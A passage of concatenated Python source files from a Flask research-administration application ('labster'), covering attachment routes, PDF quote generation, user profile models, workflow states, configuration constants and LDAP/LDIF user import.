demande = db.session.query(Demande).get(demande_id)
blob = Blob.query.get(blob_id)
if not demande or not blob:
raise NotFound()
check_read_access(demande)
def get_filename(demande, blob_id):
for filename, v in demande.attachments.items():
if v["id"] == blob_id:
return filename
for d in demande.documents_generes:
if d["blob_id"] == blob_id:
return d["name"]
return "fichier inconnu"
filename = get_filename(demande, blob_id)
suffix = get_suffix_for(blob.value or b"")
if not suffix:
suffix = ".pdf"
if not filename.endswith(suffix):
filename = filename + suffix
response = make_response(blob.value or "")
if blob.value:
response.headers["content-type"] = magic.from_buffer(blob.value, mime=True)
else:
response.headers["content-type"] = "text/plain"
content_disposition = f'attachment;filename="{filename}"'
response.headers["content-disposition"] = content_disposition.encode()
return response
def get_suffix_for(value: bytes):
mime_type = magic.from_buffer(value, mime=True)
extension = mimetypes.guess_extension(mime_type)
return extension
@route("/upload/", methods=["POST"])
def upload(request: Request, db: SQLAlchemy):
user = get_current_profile()
form = request.form
demande_id = form["demande_id"]
demande = db.session.query(Demande).get(demande_id)
check_can_add_pj(demande)
files = request.files
for file in files.values():
file_name = file.filename
data = file.read()
blob = Blob(data)
db.session.add(blob)
db.session.flush()
demande.attachments[file_name] = {
"date": datetime.now().isoformat(),
"id": blob.id,
"creator": user.login,
}
db.session.commit()
return "OK"
@route("/demandes/<int:id>/devis_rh")
def devis_rh_rest(id, db: SQLAlchemy):
demande = db.session.query(Demande).get(id)
if acces_restreint(demande):
raise Forbidden()
assert isinstance(demande, DemandeRH)
response = make_response(devis_rh(demande))
response.headers["content-type"] = "application/pdf"
content_disposition = 'attachment;filename="devis-rh.pdf"'
response.headers["content-disposition"] = content_disposition.encode()
return response
@route("/calculettes/devis_rh", methods=["POST"])
def calculette_rh(db: SQLAlchemy, structure_repo: StructureRepository):
demande = DemandeRH()
json = request.json
model = json["model"]
form = json["form"]
user = get_current_profile()
model = cleanup_model(model, form)
demande = DemandeRH(data=model)
demande.form_state = form
porteur_dto = model.get("porteur")
if porteur_dto:
porteur_id = porteur_dto["value"]
demande.porteur = db.session.query(Profile).get(porteur_id)
if user != demande.porteur:
demande.gestionnaire = user
structure_dto = model.get("laboratoire")
if structure_dto:
structure_id = structure_dto["value"]
demande.structure = structure_repo.get_by_id(structure_id)
blob = devis_rh(demande)
response = make_response(blob)
response.headers["content-type"] = "application/pdf"
return response
@route("/demandes/<int:id>/lettre_commande_rh")
def lettre_commande_rh_rest(id, db: SQLAlchemy):
demande = db.session.query(Demande).get(id)
if acces_restreint(demande):
raise Forbidden()
assert isinstance(demande, DemandeRH)
response = make_response(lettre_commande_rh(demande))
response.headers["content-type"] = "application/pdf"
content_disposition = 'attachment;filename="lettre-commande-rh.pdf"'
response.headers["content-disposition"] = content_disposition.encode()
return response
@route("/demandes/<int:id>/fdc")
def fdc(id: int, db: SQLAlchemy):
demande = db.session.query(Demande).get(id)
# model = demande.feuille_cout
html = demande.data["fdc_html"].encode("utf8")
return html, 200, {"content-type": "text/html"}
# css = CSS(string="")
#
# s = HTML(string=html).write_pdf(stylesheets=[css])
# assert s
# return html, 200, {"content-type": "application/pdf"}
# response = make_response(s)
# response.headers["content-type"] = "application/pdf"
# return response
@route("/demandes_a_valider/<type>")
@route("/demandes_a_valider/")
def demandes_a_valider(type=None):
if type:
return redirect(f"/#/demandes_a_valider/{type}")
else:
return redirect("/#/tasks")
```
#### File: domain2/model/profile.py
```python
from __future__ import annotations
from abc import ABC, ABCMeta
from datetime import datetime
from typing import TYPE_CHECKING, Any, Set
from uuid import uuid4
from abilian.app import db
from sqlalchemy import JSON, Boolean, Column, DateTime, Integer, String
from labster.domain2.model.base import Repository
from labster.ldap.constants import DRI_DN
if TYPE_CHECKING:
from labster.domain2.model.structure import Structure
from labster.domain2.services.roles import Role
FLUX_TENDU = 0
DAILY = 1
WEEKLY = 2
class ProfileId(str):
@staticmethod
def new() -> ProfileId:
return ProfileId(uuid4())
# @attrs(eq=False, order=False, repr=False, auto_attribs=True)
class Profile(db.Model):
__tablename__ = "v3_profiles"
id = Column(String(36), primary_key=True)
uid = Column(String(64), unique=True, nullable=True)
old_id = Column(Integer, unique=True, nullable=True)
old_uid = Column(String(64), unique=True, nullable=True)
login = Column(String(64), default="", nullable=False)
nom = Column(String, default="", nullable=False)
prenom = Column(String, default="", nullable=False)
email = Column(String, default="", nullable=False)
adresse = Column(String, default="", nullable=False)
telephone = Column(String, default="", nullable=False)
active = Column(Boolean, default=False, nullable=False)
affectation = Column(String, default="", nullable=False)
fonctions = Column(JSON, nullable=False)
preferences_notifications = Column(Integer, default=0, nullable=False)
preferences_nb_jours_notifications = Column(Integer, default=0)
date_derniere_notification_vue = Column(DateTime, default=datetime.utcnow)
def __init__(self, **kw):
self.id = str(uuid4())
self.nom = ""
self.prenom = ""
self.fonctions = []
super().__init__(**kw)
def __str__(self):
return f"<Profile {self.full_name}>"
def __repr__(self):
return str(self)
@property
def full_name(self):
return self.prenom + " " + self.nom
@property
def reversed_name(self):
return f"{self.nom}, {self.prenom}"
@property
def name(self):
return self.full_name
def activate(self):
self.active = True
def deactivate(self):
self.active = False
#
# Roles
#
def structure_d_appartenance(self) -> Structure:
from labster.di import injector
from labster.domain2.services.roles import Role, RoleService
role_service = injector.get(RoleService)
roles_dict = role_service.get_roles_for_user(self)
structures = roles_dict[Role.MEMBRE_AFFECTE]
assert len(structures) == 1
return list(structures)[0]
def has_role(self, role: Role, context: Any = None) -> bool:
from labster.di import injector
from labster.domain2.services.roles import RoleService
role_service = injector.get(RoleService)
return role_service.has_role(self, role, context)
def is_membre_dri(self):
from labster.di import injector
from labster.domain2.model.structure import StructureRepository
from labster.domain2.services.roles import Role
structure_repo = injector.get(StructureRepository)
dri = structure_repo.get_by_dn(DRI_DN)
return self.has_role(Role.MEMBRE, dri)
class ProfileRepository(Repository, ABC, metaclass=ABCMeta):
def get_all(self) -> Set[Profile]:
raise NotImplementedError
def put(self, profile: Profile):
raise NotImplementedError
def delete(self, profile: Profile):
raise NotImplementedError
def get_by_id(self, id: ProfileId) -> Profile:
raise NotImplementedError
def get_by_uid(self, uid: str) -> Profile:
raise NotImplementedError
def get_by_old_id(self, old_id: int) -> Profile:
raise NotImplementedError
def get_by_login(self, login: str) -> Profile:
raise NotImplementedError
def get_by_old_uid(self, old_uid: str) -> Profile:
raise NotImplementedError
```
#### File: services/workflow/forms.py
```python
from __future__ import annotations
def get_form(
require_note=False,
ask_for_revalidation=False,
with_no_infolab=False,
with_no_eotp=False,
):
form = [
{"name": "note", "label": "Note", "type": "textarea", "required": require_note},
]
if ask_for_revalidation:
form.append(
{
"name": "resoumission",
"label": "Redemander validation par la hiérarchie",
"type": "bool",
"required": False,
},
)
if with_no_infolab:
form.append(
{
"name": "no_infolab",
"label": "N° Infolab / Référence",
"type": "text",
"required": True,
},
)
if with_no_eotp:
form.append(
{"name": "no_eotp", "label": "N° EOTP", "type": "text", "required": True},
)
return form
```
#### File: services/workflow/states.py
```python
from __future__ import annotations
from typing import TYPE_CHECKING, List, Set
import structlog
from labster.lib.workflow import State, Workflow
if TYPE_CHECKING:
from labster.domain2.model.profile import Profile
logger = structlog.get_logger()
class EnEdition(State):
label = "En édition"
next_action = "Edition à finaliser et à soumettre"
def on_enter(self, workflow):
case = workflow.case
case.active = True
case.editable = True
def task_owners(self, workflow):
case = workflow.case
return {u for u in [case.gestionnaire, case.porteur] if u}
class EnValidation(State):
label = "En cours de validation"
label_short = "En validation"
next_action = "Demande à considérer pour validation"
def task_owners(self, workflow: Workflow) -> Set[Profile]:
demande = workflow.case
assert demande
structures_signataires = demande.structures_signataires()
signatures = workflow.get_value("signatures") or []
result = set()
for structure in structures_signataires:
if structure.id not in signatures:
result.update(structure.responsables)
return result
class EnVerification(State):
label = "Recevabilité en cours de vérification"
label_short = "En vérification"
next_action = "Recevabilité à confirmer"
def on_enter(self, workflow):
workflow.set_value("ar_envoye", False)
def task_owners(self, workflow):
case = workflow.case
if case.contact_labco:
return {case.contact_labco}
else:
return set()
class EnInstruction(State):
label = "En cours d'instruction par la DR&I"
label_short = "En instruction"
next_action = "Instruction à mener et finaliser"
def task_owners(self, workflow):
case = workflow.case
if case.contact_labco:
return {case.contact_labco}
else:
return set()
# Etats finaux
class Traitee(State):
label = "Traitée par la DR&I"
label_short = "Traitée"
is_final = True
class Rejetee(State):
label = "Rejetée par la DR&I"
label_short = "Rejetée"
is_final = True
class Abandonnee(State):
label = "Abandonnée par le porteur"
label_short = "Abandonnée"
is_final = True
EN_EDITION = EnEdition()
EN_VALIDATION = EnValidation()
EN_VERIFICATION = EnVerification()
EN_INSTRUCTION = EnInstruction()
TRAITEE = Traitee()
REJETEE = Rejetee()
ABANDONNEE = Abandonnee()
ACTIVE_STATES: List[State] = [
EN_EDITION,
EN_VALIDATION,
EN_VERIFICATION,
EN_INSTRUCTION,
]
INACTIVE_STATES: List[State] = [TRAITEE, REJETEE, ABANDONNEE]
ALL_STATES: List[State] = ACTIVE_STATES + INACTIVE_STATES
```
#### File: services/workflow/workflow.py
```python
from __future__ import annotations
from labster.lib.workflow import Workflow
from .states import ALL_STATES, EN_EDITION
from .transitions import ABANDONNER, ACCUSER_RECEPTION, COMMENTER, \
CONFIRMER_FINALISATION_DGRTT, CONFIRMER_RECEVABILITE_DGRTT, DESARCHIVER, \
PRENDRE_LA_MAIN_DGRTT, PRENDRE_LA_MAIN_GESTIONNAIRE, REJETER_DGRTT, \
REQUERIR_MODIFICATION_DGRTT, REQUERIR_MODIFICATION_DIR, SOUMETTRE, \
VALIDER_DIR
class LabsterWorkflow(Workflow):
initial_state = EN_EDITION
states = ALL_STATES
# NB: order counts!
transitions = [
SOUMETTRE,
PRENDRE_LA_MAIN_GESTIONNAIRE,
VALIDER_DIR,
PRENDRE_LA_MAIN_DGRTT,
REQUERIR_MODIFICATION_DIR,
ACCUSER_RECEPTION,
CONFIRMER_RECEVABILITE_DGRTT,
CONFIRMER_FINALISATION_DGRTT,
REQUERIR_MODIFICATION_DGRTT,
REJETER_DGRTT,
ABANDONNER,
DESARCHIVER,
COMMENTER,
]
def actor_is_contact_labco(self):
return self.actor == self.case.contact_labco
def actor_is_porteur_or_gestionnaire(self):
return self.actor in (self.case.porteur, self.case.gestionnaire)
```
#### File: domain/models/profiles.py
```python
from __future__ import annotations
import json
from datetime import datetime
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Set, Text, Tuple
import ramda as r
import structlog
from abilian.core.entities import Entity, EntityQuery
from flask_login import UserMixin
from sqlalchemy import Boolean, Column, DateTime, ForeignKey, Integer, \
String, Unicode, text
from sqlalchemy.orm import relationship
from labster.domain.services import dgrtt as dgrtt_service
from labster.domain.services.roles import all_roles, get_roles, has_role, \
set_role_value
from .unites import OrgUnit
from .workflow import EN_VALIDATION
if TYPE_CHECKING:
from .demandes import Demande
from .roles import Role
__all__ = ("Profile", "FLUX_TENDU", "DAILY", "WEEKLY")
logger = structlog.get_logger()
FLUX_TENDU = 0
DAILY = 1
WEEKLY = 2
class RolesMixin:
def has_role(self, role, target=None):
# type: (Any, Any) -> bool
"""Return True if profile has given role on given target."""
if isinstance(role, (list, tuple, set)):
return any(self.has_role(r, target) for r in role)
return has_role(self, role, target) # type: ignore
def all_roles(self):
return all_roles(self)
def get_roles(self, type=None):
return get_roles(self, type)
def set_role_value(self, role: str, value: bool, target=None):
return set_role_value(self, role, value, target)
def set_default_roles(self):
self.set_role_recherche()
self.set_role_dgrtt()
def set_role_recherche(self):
roles = self.ldap_dict.get("eduPersonAffiliation")
if "faculty" in roles or "researcher" in roles:
self.set_role_value("porteur", True)
def set_role_dgrtt(self):
if self.has_role("dgrtt"):
self.set_role_value("contact dgrtt", True)
else:
self.set_role_value("contact dgrtt", False)
class ChercheurMixin:
"""Méthodes spécifiques au rôle "chercheur"."""
@property
def contacts_dgrtt(self) -> List[Tuple[str, str, Profile]]:
"""Return a list of tuples: (bureau.id, bureau.nom, contact)"""
from labster.domain.models.mapping_dgrtt import MappingDgrtt
labo = self.laboratoire # type: ignore
mapping_dgrtt = MappingDgrtt.query.filter(
MappingDgrtt.ou_recherche == labo
).all()
result = []
for bureau in dgrtt_service.BUREAUX_DGRTT:
if bureau.id in ["AIPI 2", "Com", "Finance 2", "Finance 3", "Moyens"]:
continue
for m in mapping_dgrtt:
if m.bureau_dgrtt == bureau.id:
result.append((bureau.id, bureau.nom, m.contact_dgrtt))
break
return result
class DirectionRechercheMixin:
"""Méthodes spécifiques au rôle "direction de recherche"."""
@property
def stucture_dont_je_suis_le_directeur(self) -> Optional[OrgUnit]:
from labster.domain.models.roles import RoleType
roles = self.get_roles(RoleType.DIRECTION) # type: ignore
if len(roles) > 1:
uid = self.uid # type: ignore
logger.error(f"L'utilisateur {uid} a plusieurs roles de direction")
if not roles:
return None
return roles[0].context
def demandes_a_valider(self) -> List[Demande]:
demandes = self.mes_taches() # type: ignore
return [d for d in demandes if d.wf_state == EN_VALIDATION.id]
class GestionnaireMixin:
def get_membres_de_mes_structures(self) -> List[Profile]:
from .roles import RoleType
roles = self.get_roles(RoleType.GDL) # type: ignore
membres: Set[Profile] = set()
for role in roles:
org = role.context
membres.update(org.get_membres())
return r.sort_by(lambda x: x.nom, list(membres))
class RechercheMixin(ChercheurMixin, DirectionRechercheMixin):
roles: List[Role]
laboratoire: OrgUnit
@property
def structure(self) -> OrgUnit:
sous_structure = self.sous_structure
if sous_structure:
return sous_structure
else:
return self.laboratoire
@property
def sous_structure(self) -> Optional[OrgUnit]:
from .roles import RoleType
roles = self.roles
roles = [r for r in roles if r.type == RoleType.MEMBRE.value]
assert len(roles) in (0, 1)
if roles:
return roles[0].context
else:
return None
@property
def equipe(self) -> Optional[OrgUnit]:
from .unites import EQUIPE
sous_structure = self.sous_structure
if not sous_structure:
return None
if sous_structure.type == EQUIPE:
return sous_structure
parent = sous_structure.parent
if parent.type == EQUIPE:
return parent
return None
@property
def departement(self) -> Optional[OrgUnit]:
from labster.domain.models.unites import DEPARTEMENT, EQUIPE
sous_structure = self.sous_structure
if not sous_structure:
return None
if sous_structure.type == DEPARTEMENT:
return sous_structure
if sous_structure.type == EQUIPE:
parent = sous_structure.parent
if parent.type == DEPARTEMENT:
return parent
return None
class AgentDgrttMixin:
@property
def bureau_dgrtt(self):
"""Mon bureau DGRTT."""
return dgrtt_service.get_bureau_dgrtt(self)
@property
def perimetre_dgrtt(self):
"""Liste des labos auprès desquels l'agent intervient."""
return dgrtt_service.get_perimetre_dgrtt(self)
class DirectionDgrttMixin:
pass
class WorkflowActorMixin(RolesMixin):
# Silence the typechecker
laboratoire: Optional[OrgUnit]
@property
def stucture_dont_je_suis_le_directeur(self) -> Optional[OrgUnit]:
return None
@property
def perimetre_dgrtt(self) -> Set[OrgUnit]:
return set()
class ProfileQuery(EntityQuery):
def get_by_uid(self, uid: str) -> Profile:
return self.filter(Profile.uid == uid).one()
class Profile(UserMixin, AgentDgrttMixin, RechercheMixin, WorkflowActorMixin, Entity):
__tablename__ = "profile"
__indexable__ = False
query_class = ProfileQuery
#: Unique id from LDAP (ex: "jdupont"), not the same as id (surrogate key)
uid = Column(String, nullable=False, unique=True, index=True)
# TODO: add 'nullable=False'
active = Column(Boolean, default=True, server_default=text("TRUE"))
nom = Column(Unicode, nullable=False)
prenom = Column(Unicode, nullable=False)
email = Column(String, nullable=False)
adresse = Column(Unicode, default="")
telephone = Column(Unicode, default="")
laboratoire_id = Column(Integer, ForeignKey(OrgUnit.id))
laboratoire = relationship(
OrgUnit, foreign_keys=[laboratoire_id], backref="membres"
)
#: Membre de la gouvernance ?
gouvernance = Column(Boolean)
#: A vraiment les droits de la gouvernance
gouvernance_vraiment = Column(Boolean)
#: Membre de la DGRTT
dgrtt = Column(Boolean)
chef_du_bureau = Column(Unicode)
#: LDAP stuff
fonction_structurelle_principale = Column(Unicode)
#: More LDAP stuff
ldap_entry = Column(String)
#: Infos récupérées au login (CAS)
cas_entry = Column(String)
date_derniere_notification_vue = Column(
DateTime, default=datetime.utcnow, nullable=False
)
date_last_login = Column(DateTime)
#: FLUX_TENDU = 0
#: DAILY = 1
#: WEEKLY = 2
preferences_notifications = Column(Integer, default=0)
preferences_nb_jours_notifications = Column(Integer, default=0)
@property
def id(self):
return self.uid
@property
def full_name(self) -> str:
return f"{self.prenom} {self.nom}"
@property
def ldap_dict(self) -> Dict[Text, Any]:
try:
return json.loads(self.ldap_entry)
except (ValueError, TypeError):
return {}
@property
def cas_dict(self) -> Dict[Text, Any]:
try:
return json.loads(self.cas_entry)
except (ValueError, TypeError):
return {}
def __repr__(self):
return f"<Profile name={self.full_name} id={self.id}>"
def __eq__(self, other):
if not isinstance(other, Profile):
return False
return self.uid == other.uid
def __hash__(self):
return hash(self.uid)
def nb_notifications_non_vues(self) -> int:
from .notifications import Notification
return (
Notification.query.filter(Notification.user == self)
.filter(Notification.created_at > self.date_derniere_notification_vue)
.count()
)
@property
def is_directeur(self) -> bool:
"""Vrai si le profil est vraiment le directeur de la structure."""
return "{15079}" in self.fonction_structurelle_principale
```
#### File: domain/services/constants.py
```python
from __future__ import annotations
import json
from os.path import dirname
from typing import Any, Dict
import structlog
from dotted.collection import DottedCollection, DottedDict
from labster.domain.models.config import Config
from labster.extensions import db
"""
- adding new constants: add their type in TYPES and their values in
constants.json. get_constant will check for the new constants.
- upgrading the value of existing constants: use _upgrade_if_needed and the version number.
"""
logger = structlog.get_logger()
TYPES = {
"api_key": "str",
"convention.COUT_ENVIRONNEMENT_PERSONNEL_HEBERGE": "int",
"convention.COUT_HORAIRE_STAGE": "float",
"convention.DUREE_AMORTISSEMENT": "list[list[str,int]]",
"convention.REMUNERATION": "list[list[str,int]]",
"convention.TAUX_CHARGE_PATRONALE": "float",
"convention.TAUX_ENVIRONNEMENT_PERSONNEL_NON_PERMANENT": "float",
"convention.TAUX_ENVIRONNEMENT_PERSONNEL_PERMANENT": "float",
"convention.TAUX_PARTICIPATION_COUTS_INDUITS": "float",
"convention.TAUX_PROVISION_RISQUE": "float",
"faq_categories": "list[str]",
"message_dgrtt": "HTML",
"nom_bureaux_dgrtt.MSAR": "str",
"nom_bureaux_dgrtt.PIJ": "str",
"nom_bureaux_dgrtt.ETI": "str",
"nom_bureaux_dgrtt.AIPI": "str",
"nom_bureaux_dgrtt.CC": "str",
"nom_bureaux_dgrtt.CFE": "str",
"nom_bureaux_dgrtt.GF": "str",
"nom_bureaux_dgrtt.EU": "str",
"nom_bureaux_dgrtt.PI2": "str",
"nom_bureaux_dgrtt.CP": "str",
"nom_bureaux_dgrtt.REF": "str",
"nom_bureaux_dgrtt.DIR": "str",
"nom_bureaux_dgrtt.CT": "str",
"nom_bureaux_dgrtt.ETT": "str",
"point_indice": "float",
"recrutement.charges_moins_12_mois": "float",
"recrutement.charges_plus_12_mois": "float",
"recrutement.ecoles_doctorales": "list[str]",
"recrutement.grades": "list[str]",
"recrutement.salaire_brut_mensuel_indicatif.Chercheur": "str",
"recrutement.salaire_brut_mensuel_indicatif.Post-doctorant": "list[list[str,int]]",
"recrutement.salaire_brut_mensuel_indicatif.IGR": "list[list[str,int]]",
"recrutement.salaire_brut_mensuel_indicatif.IGE": "list[list[str,int]]",
"recrutement.salaire_brut_mensuel_indicatif.ASI": "list[list[str,int]]",
"recrutement.salaire_brut_mensuel_indicatif.technicien-sup": "list[list[str,int]]",
"recrutement.salaire_brut_mensuel_indicatif.technicien-normale": "list[list[str,int]]",
"recrutement.salaire_brut_mensuel_indicatif.adjoint": "list[list[str,int]]",
"recrutement.principes": "HTML",
"recrutement.provision_risque_charge_employeur": "float",
"recrutement.salaire_min_doctorant": "float",
"recrutement.couts_charges.PU/DR C EX Confirmé": "str",
"recrutement.couts_charges.PU/DR C EX": "str",
"recrutement.couts_charges.PU/DR C1 Confirmé": "str",
"recrutement.couts_charges.PU/DR C1": "str",
"recrutement.couts_charges.PU/DR C2 Confirmé": "str",
"recrutement.couts_charges.PU/DR C2": "str",
"recrutement.couts_charges.MC/CR HC Confirmé": "str",
"recrutement.couts_charges.MC/CR HC": "str",
"recrutement.couts_charges.MC/CR CN Confirmé": "str",
"recrutement.couts_charges.MC/CR CN": "str",
"recrutement.couts_charges.IR HC Confirmé": "str",
"recrutement.couts_charges.IR HC": "str",
"recrutement.couts_charges.IR C1 Confirmé": "str",
"recrutement.couts_charges.IR C1": "str",
"recrutement.couts_charges.IR C2 Confirmé": "str",
"recrutement.couts_charges.IR C2": "str",
"recrutement.couts_charges.IE HC confirmé": "str",
"recrutement.couts_charges.IE HC": "str",
"recrutement.couts_charges.IE C1 Confirmé": "str",
"recrutement.couts_charges.IE C1": "str",
"recrutement.couts_charges.IE C2 Confirmé": "str",
"recrutement.couts_charges.IE C2": "str",
"recrutement.couts_charges.ASI Confirmé": "str",
"recrutement.couts_charges.ASI": "str",
"recrutement.couts_charges.TR CE Confirmé": "str",
"recrutement.couts_charges.TR CE": "str",
"recrutement.couts_charges.TR CS Confirmé": "str",
"recrutement.couts_charges.TR CS": "str",
"recrutement.couts_charges.TR CN Confirmé": "str",
"recrutement.couts_charges.TR CN": "str",
"recrutement.transport": "float",
"demande_recrutement.pj": "HTML",
"demande_recrutement.bareme": "HTML",
"pi_invention.pieces_a_joindre": "HTML",
"pi_invention.conditions": "HTML",
"pi_logiciel.conditions": "HTML",
}
VALID_TYPES = [
"int",
"float",
"bool",
"str",
"HTML",
"list[str]",
"list[list[str,int]]",
]
for t in TYPES.values():
assert t in VALID_TYPES, t
def get_message_dgrtt():
return get_constant("message_dgrtt", "OK")
def get_faq_categories():
categories = get_constant("faq_categories", [])
return [(x, x) for x in categories]
def _get_constants() -> Dict[str, Any]:
"""Get constants from config or local json with updating system.
Pick new constants that are defined in TYPES but are not saved in
the config yet from the json.
Upgrades constants that already exist, given the version number.
"""
from labster.domain.models.config import Config
config = Config.query.first()
if config is None:
config = Config()
db.session.add(config)
initial_constants = get_initial_constants()
# upgrade
_upgrade_if_needed(config, initial_constants)
constants = config.data
dotted_constants = DottedCollection.factory(constants)
json_dotted_constants = DottedCollection.factory(initial_constants)
if dotted_constants:
for key in TYPES.keys():
# do not write "key not in .keys()", it doesn't return "dotted keys".
if dotted_constants.get(key, _MARKER) is _MARKER:
dotted_constants[key] = json_dotted_constants.get(key)
constants = dotted_constants.to_python()
return constants
def _upgrade_if_needed(config: Config, initial_constants: Dict[str, Any]):
""" "data migration" tool.
- constants: the ones from the config, to update.
- initial_constants: from the json file, that may have additions.
"""
needs_commit = False
version = initial_constants.get("version")
if not version:
return
constants = config.data or {}
# Check the state we want rather than a version number.
# if version == 0.2 and constants.get('version', 0) < 0.2:
if "recrutement" not in constants:
constants["recrutement"] = {}
needs_commit = True
if "grades" not in constants["recrutement"]:
constants["recrutement"]["grades"] = []
needs_commit = True
if (
"recrutement" in constants
and constants["recrutement"]["grades"]
and constants["recrutement"]["grades"][0] == "IR"
):
constants["recrutement"]["grades"] = initial_constants["recrutement"]["grades"]
constants["version"] = version
needs_commit = True
if version == 0.3:
# add salaire_brut_mensuel_indicatif.doctorat-plus-3
# Maybe a new DB doesn't have salaire_brut_mensuel_indicatif yet.
if not constants["recrutement"].get("salaire_brut_mensuel_indicatif"):
constants["recrutement"][
"salaire_brut_mensuel_indicatif"
] = initial_constants["recrutement"]["salaire_brut_mensuel_indicatif"]
else:
post_doct_names = [
it[0]
for it in constants["recrutement"]["salaire_brut_mensuel_indicatif"][
"Post-doctorant"
]
]
if "doctorat-plus-3" not in post_doct_names:
constants["recrutement"]["salaire_brut_mensuel_indicatif"][
"Post-doctorant"
].append(
initial_constants["recrutement"]["salaire_brut_mensuel_indicatif"][
"Post-doctorant"
][-1]
)
# logger.info("--- constants updated for 0.3 - doctorat-plus-3")
constants["version"] = 0.3
needs_commit = True
if needs_commit:
config.data = constants
db.session.commit()
def get_initial_constants() -> Dict[str, Any]:
filename = dirname(__file__) + "/constants.json"
return json.load(open(filename, "rb"))
def get_constants() -> Dict[str, Any]:
constants = _get_constants()
return update_constants(constants)
_MARKER = object()
def get_constant(path: str, default: object = _MARKER) -> Any:
"""Return this constant's value from a dotted path.
Raises a KeyError if the path is illegal.
- path: a dotted key (str) (example: "convention.REMUNERATION")
- returns: the value or a default one (of the good type, if specified).
"""
if path not in TYPES:
raise KeyError(path)
constants = _get_constants()
dotted_constants = DottedCollection.factory(constants)
try:
value = dotted_constants[path]
if isinstance(value, DottedCollection):
return dotted_constants[path].to_python()
else:
return value
except KeyError:
pass
# If a default value is supplied, return it
if default != _MARKER:
return default
# Otherwise, use a default depending on the type
type_ = TYPES[path]
return default_value(type_)
def default_value(type_: str) -> Any:
if type_ in ["str", "HTML"]:
return ""
elif type_ == "int":
return 0
elif type_ == "float":
return 0.0
elif type_ == "bool":
return False
elif type_.startswith("list"):
return []
else:
raise RuntimeError(f"Unknown type: {type_}")
def save_constants(constants):
from labster.domain.models.config import Config
updated_constants = update_constants(constants)
config = Config.query.first()
if config is None:
config = Config(data=updated_constants)
else:
config.data = updated_constants
return config
def update_constants(constants: Dict[str, Any]) -> Dict[str, Any]:
if "types" in constants:
del constants["types"]
dotted_constants = DottedCollection.factory(constants)
updated_constants = DottedDict()
for key, type_ in TYPES.items():
try:
# do not write "key in .keys()", it doesn't check for dotted keys.
if dotted_constants.get(key, _MARKER) is not _MARKER:
value = dotted_constants[key]
elif key in TYPES.keys():
value = get_constant(key)
else:
value = default_value(type_)
except KeyError:
value = default_value(type_)
try:
value = coerce(value, type_)
except TypeError:
msg = "Wrong type for key: {}, value{} "
raise TypeError(msg.format(key, value))
check_type(key, value, type_)
updated_constants[key] = value
return updated_constants.to_python()
def check_type(key: str, value: Any, type_: str) -> None:
def ensure_types(types):
val = value
if isinstance(value, DottedCollection):
val = value.to_python()
if not isinstance(val, types):
msg = f"Wrong type for key: {key}. Expected: {type_}, got: {type(val)}"
raise TypeError(msg)
if type_ == "int":
ensure_types(int)
elif type_ == "float":
ensure_types((float, int))
elif type_ == "str":
ensure_types(str)
elif type_ == "bool":
ensure_types(bool)
elif type_.startswith("list"):
ensure_types(list)
# TODO: more specific cases
def coerce(value: Any, type_: str) -> Any:
if type_ == "int":
return int(value)
elif type_ == "float":
return float(value)
elif type_ == "str":
return str(value)
elif type_ == "bool":
return bool(value)
else:
return value
```
#### File: labster/extensions/profiler.py
```python
from __future__ import annotations
import flask_profiler
def register_profiler(app):
config = app.config
if not config.get("PROFILER_ENABLE"):
return
password = config.get("PROFILER_PASSWORD")
config["flask_profiler"] = {
"enabled": True,
"storage": {"engine": "sqlalchemy"},
"ignore": ["^/static/.*"],
}
if password:
config["flask_profiler"]["basicAuth"] = {
"enabled": True,
"username": "profiler",
"password": password,
}
flask_profiler.init_app(app)
```
#### File: labster/ldap/ldif.py
```python
from __future__ import annotations
import re
from io import BytesIO
from typing import Any, Dict, List, Optional, Tuple
import structlog
from attr import attrs
from devtools import debug
from flask_sqlalchemy import SQLAlchemy
from ldif import LDIFParser
from tqdm import tqdm
from labster.di import injector
from labster.domain2.model.profile import Profile, ProfileRepository
from labster.domain2.model.structure import Structure, StructureRepository
from labster.ldap.constants import ADMINS_DN, PRESIDENCE_DN, SU_DN, \
get_parent_dn
logger = structlog.get_logger()
profile_repo = injector.get(ProfileRepository)
structure_repo = injector.get(StructureRepository)
db = injector.get(SQLAlchemy)
def parse_ldif_file(ldif_file: str) -> List[Tuple[str, Dict[str, Any]]]:
logger.info(f"### Parsing LDIF file {ldif_file}")
orig_ldif_fd = open(ldif_file, "rb")
ldif_fd = BytesIO()
for line in orig_ldif_fd.readlines():
if line.startswith(b"# search result"):
break
ldif_fd.write(line)
ldif_fd.seek(0)
parser = LDIFParser(ldif_fd)
return list(parser.parse())
@attrs(auto_attribs=True)
class LdifRecord:
raw: Dict[str, List[str]]
def __getattr__(self, name):
return self.raw.get(name, [""])[0]
@property
def uid(self) -> Optional[str]:
if "uid" not in self.raw:
return None
return self.raw["uid"][0]
@property
def affectation(self) -> Optional[str]:
structure_affectaction = self._get_structure_d_affectation()
if not structure_affectaction:
return None
affectation = structure_affectaction.dn
if affectation in ADMINS_DN:
affectation = get_parent_dn(affectation)
if affectation == PRESIDENCE_DN:
affectation = SU_DN
return affectation
def _get_structure_d_affectation(self) -> Optional[Structure]:
structure_d_affectation = None
affectation_principale = self.supannEntiteAffectationPrincipale
if affectation_principale:
structure_d_affectation = (
db.session.query(Structure)
.filter(Structure.supann_code_entite == affectation_principale)
.first()
)
if structure_d_affectation:
return structure_d_affectation
# Old LDIF format
affectation = self.sorbonneUniversiteEmpAffectation
if affectation:
structure_d_affectation = (
db.session.query(Structure).filter(Structure.dn == affectation).first()
)
if structure_d_affectation:
return structure_d_affectation
return None
@property
def fonctions(self):
return self.raw.get("eduPersonAffiliation", [])
@property
def address(self):
adresse = self.raw.get("postalAddress", [""])[0]
adresse = adresse.replace("$", "\n")
adresse = re.sub("\n\n+", "\n\n", adresse)
adresse = adresse.strip()
return adresse
def update_users_from_records(records: List[Tuple[str, Dict[str, List[str]]]]):
profiles = profile_repo.get_all()
old_profile_uids = {
profile.uid for profile in profiles if profile.uid and profile.active
}
count0 = len(old_profile_uids)
print(f"old total: {count0:d}")
logger.info(f"old total: {count0:d}")
new_profile_uids = set()
for _dn, r in records:
if "uid" not in r:
continue
uid = r["uid"][0]
new_profile_uids.add(uid)
deleted_uids = old_profile_uids.difference(new_profile_uids)
deactivate_users(deleted_uids)
uids_to_profiles = {p.uid: p for p in profiles}
print("Updating profiles from LDIF dump")
for _dn, r in tqdm(records, disable=None):
record = LdifRecord(r)
if not record.uid:
continue
uid = record.uid
if not uid:
continue
if uid in uids_to_profiles:
profile = uids_to_profiles[uid]
else:
profile = Profile(uid=uid)
profile_repo.put(profile)
update_profile_from_record(profile, record)
